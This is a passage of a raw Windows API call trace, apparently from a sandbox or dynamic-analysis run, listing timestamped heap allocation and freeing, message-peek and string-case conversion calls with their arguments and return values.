hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0208.757] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0208.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.757] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0208.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.758] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0208.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.759] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.759] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.759] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0208.759] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0208.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.759] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0208.760] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0208.760] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.761] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.761] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0208.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0208.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0208.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0208.762] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0208.762] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.763] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0208.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab2eb0 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0208.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: 